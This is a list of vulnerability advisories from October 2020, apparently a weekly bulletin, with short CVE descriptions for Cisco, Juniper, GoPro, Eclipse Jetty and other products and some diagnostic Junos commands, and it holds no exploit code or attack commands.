Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3580
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access rule and access parts of the WebVPN portal that are supposed to be blocked. The vulnerability is due to insufficient validation of URLs when portal access rules are configured. An attacker could exploit this vulnerability by accessing certain URLs on the affected device. 2020-10-21 not yet calculated CVE-2020-3578
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the TLS handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000 Series firewalls could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper implementation of countermeasures against the Bleichenbacher attack for cipher suites that rely on RSA for key exchange. An attacker could exploit this vulnerability by sending crafted TLS messages to the device, which would act as an oracle and allow the attacker to carry out a chosen-ciphertext attack. A successful exploit could allow the attacker to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions to the affected device. To exploit this vulnerability, an attacker must be able to perform both of the following actions: capture TLS traffic that is in transit between clients and the affected device, and actively establish a considerable number of TLS connections to the affected device. 2020-10-21 not yet calculated CVE-2020-3585
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the TCP packet processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory exhaustion condition. An attacker could exploit this vulnerability by sending a high rate of crafted TCP traffic through an affected device. A successful exploit could allow the attacker to exhaust device resources, resulting in a DoS condition for traffic transiting the affected device. 2020-10-21 not yet calculated CVE-2020-3554
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3582
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the IP fragment-handling implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak on an affected device. This memory leak could prevent traffic from being processed through the device, resulting in a denial of service (DoS) condition. The vulnerability is due to improper error handling when specific failures occur during IP fragment reassembly. An attacker could exploit this vulnerability by sending crafted, fragmented IP traffic to a targeted device. A successful exploit could allow the attacker to continuously consume memory on the affected device and eventually impact traffic, resulting in a DoS condition. The device could require a manual reboot to recover from the DoS condition. Note: This vulnerability applies to both IP Version 4 (IPv4) and IP Version 6 (IPv6) traffic. 2020-10-21 not yet calculated CVE-2020-3373
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the OSPF Version 2 (OSPFv2) implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation when the affected software processes certain OSPFv2 packets with Link-Local Signaling (LLS) data. An attacker could exploit this vulnerability by sending a malformed OSPFv2 packet to an affected device. A successful exploit could allow the attacker to cause an affected device to reload, resulting in a DoS condition. 2020-10-21 not yet calculated CVE-2020-3528
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the secure boot process of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software for the Firepower 1000 Series and Firepower 2100 Series Appliances could allow an authenticated, local attacker to bypass the secure boot mechanism. The vulnerabilities are due to insufficient protections of the secure boot process. An attacker could exploit these vulnerabilities by injecting code into specific files that are then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device, which would be executed at each boot and maintain persistence across reboots. 2020-10-21 not yet calculated CVE-2020-3458
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to upload arbitrary-sized files to specific folders on an affected device, which could lead to an unexpected device reload. The vulnerability exists because the affected software does not efficiently handle the writing of large files to specific folders on the local file system. An attacker could exploit this vulnerability by uploading files to those specific folders. A successful exploit could allow the attacker to write a file that triggers a watchdog timeout, which would cause the device to unexpectedly reload, causing a denial of service (DoS) condition. 2020-10-21 not yet calculated CVE-2020-3436
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the web interface of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition. Note: This vulnerability applies to IP Version 4 (IPv4) and IP Version 6 (IPv6) HTTP traffic. 2020-10-21 not yet calculated CVE-2020-3304
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the SSL VPN negotiation process for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient direct memory access (DMA) memory management during the negotiation phase of an SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted Datagram TLS (DTLS) traffic to an affected device. A successful exploit could allow the attacker to exhaust DMA memory on the device and cause a DoS condition. 2020-10-21 not yet calculated CVE-2020-3529
CISCO
cisco — adaptive_security_appliance_software
 
A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-10-21 not yet calculated CVE-2020-3599
CISCO
cisco — firepower_chassis_manager
 
A vulnerability in the Cisco Firepower Chassis Manager (FCM) of Cisco FXOS Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of an affected device. The vulnerability is due to insufficient CSRF protections for the FCM interface. An attacker could exploit this vulnerability by persuading a targeted user to click a malicious link. A successful exploit could allow the attacker to send arbitrary requests that could take unauthorized actions on behalf of the targeted user. 2020-10-21 not yet calculated CVE-2020-3456
CISCO
cisco — firepower_management_center
 
A vulnerability in the Common Access Card (CAC) authentication feature of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and access the FMC system. The attacker must have a valid CAC to initiate the access attempt. The vulnerability is due to incorrect session invalidation during CAC authentication. An attacker could exploit this vulnerability by performing a CAC-based authentication attempt to an affected system. A successful exploit could allow the attacker to access an affected system with the privileges of a CAC-authenticated user who is currently logged in. 2020-10-21 not yet calculated CVE-2020-3410
CISCO
cisco — firepower_management_center_and_firepower_threat_defense_software
 
A vulnerability in the sfmgr daemon of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to perform directory traversal and access directories outside the restricted path. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using a relative path in specific sfmgr commands. An exploit could allow the attacker to read or write arbitrary files on an sftunnel-connected peer device. 2020-10-21 not yet calculated CVE-2020-3550
CISCO
cisco — firepower_management_center_and_firepower_threat_defense_software
 
A vulnerability in the sftunnel functionality of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to obtain the device registration hash. The vulnerability is due to insufficient sftunnel negotiation protection during initial device registration. An attacker in a man-in-the-middle position could exploit this vulnerability by intercepting a specific flow of the sftunnel communication between an FMC device and an FTD device. A successful exploit could allow the attacker to decrypt and modify the sftunnel communication between FMC and FTD devices, allowing the attacker to modify configuration data sent from an FMC device to an FTD device or alert data sent from an FTD device to an FMC device. 2020-10-21 not yet calculated CVE-2020-3549
CISCO
cisco — firepower_management_center_software
 
A vulnerability in the host input API daemon of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted data stream to the host input daemon of the affected device. A successful exploit could allow the attacker to cause the host input daemon to restart. The attacker could use repeated attacks to cause the daemon to continuously reload, creating a DoS condition for the API. 2020-10-21 not yet calculated CVE-2020-3557
CISCO
cisco — firepower_management_center_software
 
A vulnerability in the licensing service of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper handling of system resource values by the affected system. An attacker could exploit this vulnerability by sending malicious requests to the targeted system. A successful exploit could allow the attacker to cause the affected system to become unresponsive, resulting in a DoS condition and preventing the management of dependent devices. 2020-10-21 not yet calculated CVE-2020-3499
CISCO
cisco — firepower_management_center_software
 
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-10-21 not yet calculated CVE-2020-3553
CISCO
cisco — firepower_management_center_software
 
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-10-21 not yet calculated CVE-2020-3515
CISCO
cisco — firepower_management_center_software
 
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. The vulnerability is due to improper input validation of the parameters of an HTTP request. An attacker could exploit this vulnerability by intercepting an HTTP request from a user. A successful exploit could allow the attacker to modify the HTTP request to cause the interface to redirect the user to a specific, malicious URL. This type of vulnerability is known as an open redirect attack and is used in phishing attacks that get users to unknowingly visit malicious sites. 2020-10-21 not yet calculated CVE-2020-3558
CISCO
cisco — firepower_threat_defense_software
 
A vulnerability in the multi-instance feature of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to escape the container for their Cisco FTD instance and execute commands with root privileges in the host namespace. The attacker must have valid credentials on the device. The vulnerability exists because a configuration file that is used at container startup has insufficient protections. An attacker could exploit this vulnerability by modifying a specific container configuration file on the underlying file system. A successful exploit could allow the attacker to execute commands with root privileges within the host namespace. This could allow the attacker to impact other running Cisco FTD instances or the host Cisco FXOS device. 2020-10-21 not yet calculated CVE-2020-3514
CISCO
cisco — firepower_threat_defense_software
 
A vulnerability in the Simple Network Management Protocol (SNMP) input packet processor of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly. The vulnerability is due to a lack of sufficient memory management protections under heavy SNMP polling loads. An attacker could exploit this vulnerability by sending a high rate of SNMP requests to the SNMP daemon through the management interface on an affected device. A successful exploit could allow the attacker to cause the SNMP daemon process to consume a large amount of system memory over time, which could then lead to an unexpected device restart, causing a denial of service (DoS) condition. This vulnerability affects all versions of SNMP. 2020-10-21 not yet calculated CVE-2020-3533
CISCO
cisco — fxos_software
 
A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges. 2020-10-21 not yet calculated CVE-2020-3457
CISCO
cisco — fxos_software
 
A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges. 2020-10-21 not yet calculated CVE-2020-3459
CISCO
cisco — fxos_software
 
A vulnerability in the secure boot process of Cisco FXOS Software could allow an authenticated, local attacker to bypass the secure boot mechanisms. The vulnerability is due to insufficient protections of the secure boot process. An attacker could exploit this vulnerability by injecting code into a specific file that is then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device which would be executed at each boot and maintain persistence across reboots. 2020-10-21 not yet calculated CVE-2020-3455
CISCO
cisco — multiple_products

Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass a configured File Policy for HTTP packets and deliver a malicious payload. 2020-10-21 not yet calculated CVE-2020-3299
CISCO
comtrend — ar-5387un_routers
 
A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service. 2020-10-23 not yet calculated CVE-2018-8062
MISC
crmeb — crmeb
 
An SSRF vulnerability exists in the downloadimage interface of CRMEB 3.0, which can remotely download arbitrary files on the server and remotely execute arbitrary code. 2020-10-23 not yet calculated CVE-2020-25466
MISC
MISC
MISC
crossbeam — crossbeam
 
Crossbeam is a set of tools for concurrent programming. In crossbeam-channel before version 0.4.4, the bounded channel incorrectly assumes that `Vec::from_iter` has allocated capacity that is the same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumption described above. This is unsound and causes deallocation with the incorrect capacity when `Vec::from_iter` has allocated a size different from the number of iterator elements. This has been fixed in crossbeam-channel 0.4.4. 2020-10-16 not yet calculated CVE-2020-15254
MISC
MISC
CONFIRM
MISC
cryptopro — csp
 
CryptoPro CSP through 5.0.0.10004 on 32-bit platforms allows Local Privilege Escalation (by local users with the SeChangeNotifyPrivilege right) because user-mode input is mishandled during process creation. An attacker can write arbitrary data to an arbitrary location in the kernel’s address space. 2020-10-23 not yet calculated CVE-2020-9331
MISC
cryptopro — csp
 
CryptoPro CSP through 5.0.0.10004 on 64-bit platforms allows local users with the SeChangeNotifyPrivilege right to cause denial of service because user-mode input is mishandled during process creation. 2020-10-23 not yet calculated CVE-2020-9361
MISC
dedetech — dedecms
 
A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages. 2020-10-22 not yet calculated CVE-2020-27533
MISC
domainmod — domainmod
 
DomainMOD before 4.14.0 uses MD5 without a salt for password storage. 2020-10-20 not yet calculated CVE-2019-9080
MISC
eclipse — jetty
 
In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system’s temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability. 2020-10-23 not yet calculated CVE-2020-27216
CONFIRM
CONFIRM
elasticsearch — elasticsearch
 
Elasticsearch versions before 6.8.13 and 7.9.2 contain a document disclosure flaw when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain complex queries. This could result in the search disclosing the existence of documents the attacker should not be able to view. This could result in an attacker gaining additional insight into potentially sensitive indices. 2020-10-22 not yet calculated CVE-2020-7020
MISC
MISC
excast — pro_ii
 
In EZCast Pro II, the administrator password md5 hash is provided upon a web request. This hash can be cracked to access the administration panel of the device. 2020-10-16 not yet calculated CVE-2019-12305
MISC
eyoucms — eyoucms
 
A CSRF vulnerability in Eyoucms v1.2.7 allows an attacker to add an admin account via login.php. 2020-10-22 not yet calculated CVE-2020-18129
MISC
fastd — fastd
 
receive.c in fastd before v21 allows denial of service (assertion failure) when receiving packets with an invalid type code. 2020-10-22 not yet calculated CVE-2020-27638
MISC
MISC
MISC
fortinet — fortios
 
A cleartext storage of sensitive information vulnerability in the FortiOS command line interface in versions 6.2.4 and below may allow an authenticated attacker to obtain sensitive information such as users’ passwords by connecting to the FortiGate CLI and executing the “diag sys ha checksum show” command. 2020-10-21 not yet calculated CVE-2020-6648
CONFIRM
freebox — freebox_server
 
A DNS rebinding vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3. 2020-10-19 not yet calculated CVE-2020-24375
CONFIRM
MISC
fritz!os — fritz!os
 
FRITZ!OS before 7.21 on FRITZ!Box devices allows a bypass of a DNS Rebinding protection mechanism. 2020-10-23 not yet calculated CVE-2020-26887
MISC
MISC
MISC
fruitywifi — fruitywifi
 
A Cross-Site Request Forgery (CSRF) vulnerability is identified in FruityWifi through 2.4. Due to a lack of CSRF protection in page_config_adv.php, an unauthenticated attacker can lure the victim to visit his website by social engineering or another attack vector. Due to this issue, an unauthenticated attacker can change the newSSID and hostapd_wpa_passphrase. 2020-10-23 not yet calculated CVE-2020-24847
MISC
fruitywifi — fruitywifi
 
FruityWifi through 2.4 has an unsafe Sudo configuration [(ALL : ALL) NOPASSWD: ALL]. This allows an attacker to perform a system-level (root) local privilege escalation, allowing an attacker to gain complete persistent access to the local system. 2020-10-23 not yet calculated CVE-2020-24848
MISC
fs.com — s3900_24t4s
 
An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form does not have an authentication or token authentication mechanism that allows remote attackers to forge requests on behalf of a site administrator to change all settings including deleting users, creating new users with escalated privileges. 2020-10-22 not yet calculated CVE-2020-24033
MISC
MISC
ghisler — total_commander
 
An issue was discovered in Ghisler Total Commander 9.51. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the %SYSTEMDRIVE%\totalcmd\TOTALCMD64.EXE binary. 2020-10-21 not yet calculated CVE-2020-17381
MISC
gitlab — runner
 
An issue has been discovered in GitLab Runner affecting all versions starting from 13.4.0 before 13.4.2, all versions starting from 13.3.0 before 13.3.7, all versions starting from 13.2.0 before 13.2.10. Insecure Runner Configuration in Kubernetes Environments 2020-10-22 not yet calculated CVE-2020-13327
CONFIRM
MISC
gopro — gpmf-parser
 
GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_Decompress(). Parsing malicious input can result in a crash. 2020-10-19 not yet calculated CVE-2020-16160
MISC
MISC
gopro — gpmf-parser
 
GoPro gpmf-parser 1.5 has a heap out-of-bounds read and segfault in GPMF_ScaledData(). Parsing malicious input can result in a crash or information disclosure. 2020-10-19 not yet calculated CVE-2020-16159
MISC
MISC
gopro — gpmf-parser
 
GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_ScaledData(). Parsing malicious input can result in a crash. 2020-10-19 not yet calculated CVE-2020-16161
MISC
MISC
MISC
hashicorp — nomad_and_nomad_enterprise
 
HashiCorp Nomad and Nomad Enterprise version 0.9.0 up to 0.12.5 client file sandbox feature can be subverted using either the template or artifact stanzas. Fixed in 0.12.6, 0.11.5, and 0.10.6 2020-10-22 not yet calculated CVE-2020-27195
CONFIRM
MISC
huawei — e-6878-370
 
E6878-370 versions 10.0.3.1(H557SP27C233), 10.0.3.1(H563SP21C233) and E6878-870 versions 10.0.3.1(H557SP27C233), 10.0.3.1(H563SP11C233) have a denial of service vulnerability. The system does not properly check some events; an attacker could launch the events continually, and a successful exploit could cause a reboot of the process. 2020-10-19 not yet calculated CVE-2020-9111
MISC
huawei — taurus-an00b
 
Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a privilege elevation vulnerability due to a lack of privilege restrictions on some of the business functions of the device. An attacker could exploit this vulnerability to access protected information, resulting in the elevation of privilege. 2020-10-19 not yet calculated CVE-2020-9112
MISC
imagemagik — imagemagick
 
ImageMagick 7.0.10-34 allows Division by Zero in OptimizeLayerFrames in MagickCore/layer.c, which may cause a denial of service. 2020-10-22 not yet calculated CVE-2020-27560
MISC
jboss — eap
 
A flaw was found in JBoss EAP, where the authentication configuration is set up using a legacy SecurityRealm to delegate to a legacy PicketBox SecurityDomain, and then reloaded to admin-only mode. This flaw allows an attacker to perform a complete authentication bypass by using an arbitrary user and password. The highest threat from this vulnerability is to system availability. 2020-10-16 not yet calculated CVE-2020-14299
MISC
juniper_networks — ex2300_series_devices

On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command:
    user@host> show chassis routing-engine
    Routing Engine status:
    …
    Idle 2 percent
the “Idle” value shows as low (2 % in the example above), and also the following command:
    user@host> show system processes summary
    …
    PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND
    11639 root 52 0 283M 11296K select 12:15 44.97% eventd
    11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc}
the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1668
CONFIRM
juniper_networks — ex4300_series_devices

On Juniper Networks EX4300 Series, receipt of a stream of specific IPv4 packets can cause Routing Engine (RE) high CPU load, which could lead to network protocol operation issues and traffic interruption. These specific packets can originate only from within the broadcast domain where the device is connected. This issue occurs when the packets enter the IRB interface. Only IPv4 packets can trigger this issue. IPv6 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS on EX4300 series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1670
MISC
juniper_networks — junos_os

On Juniper Networks Junos OS devices configured with DHCPv6 relay enabled, receipt of a specific DHCPv6 packet might crash the jdhcpd daemon. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of specific crafted DHCP messages will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. Only DHCPv6 packets can trigger this issue. DHCPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1672
CONFIRM
juniper_networks — junos_os

A stack buffer overflow vulnerability in the device control daemon (DCD) on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service (DoS) against the daemon or execute arbitrary code in the system with root privilege. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. Versions of Junos OS prior to 17.3 are unaffected by this vulnerability. 2020-10-16 not yet calculated CVE-2020-1664
CONFIRM
juniper_networks — junos_os

The system console configuration option ‘log-out-on-disconnect’ in Juniper Networks Junos OS Evolved fails to log out an active CLI session when the console cable is disconnected. This could allow a malicious attacker with physical access to the console the ability to resume a previous interactive session and possibly gain administrative privileges. This issue affects all Juniper Networks Junos OS Evolved versions after 18.4R1-EVO, prior to 20.2R1-EVO. 2020-10-16 not yet calculated CVE-2020-1666
CONFIRM
juniper_networks — junos_os

Receipt of a specifically malformed NDP packet sent from the local area network (LAN) to a device running Juniper Networks Junos OS Evolved can cause the ndp process to crash, resulting in a Denial of Service (DoS). The process automatically restarts without intervention, but a continuous receipt of the malformed NDP packets could lead to an extended Denial of Service condition. During this time, IPv6 neighbor learning will be affected. The issue occurs when parsing the incoming malformed NDP packet. Rather than simply discarding the packet, the process asserts, performing a controlled exit and restart, thereby avoiding any chance of an unhandled exception. Exploitation of this vulnerability is limited to a temporary denial of service, and cannot be leveraged to cause additional impact on the system. This issue is limited to the processing of IPv6 NDP packets. IPv4 packet processing cannot trigger, and is unaffected by this vulnerability. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO. Junos OS is unaffected by this vulnerability. 2020-10-16 not yet calculated CVE-2020-1681
CONFIRM
juniper_networks — junos_os
 
When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process might be bypassed due to a race condition. Due to this vulnerability, mspmand process, responsible for managing “URL Filtering service”, can crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2. 2020-10-16 not yet calculated CVE-2020-1667
MISC
juniper_networks — junos_os
 
Insufficient Cross-Site Scripting (XSS) protection in Juniper Networks J-Web and web based (HTTP/HTTPS) services allows an unauthenticated attacker to hijack the target user’s HTTP/HTTPS session and perform administrative actions on the Junos device as the targeted user. This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled such as J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP). Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes:
    user@device> show system processes | match http
    5260 - S 0:00.13 /usr/sbin/httpd-gk -N
    5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf
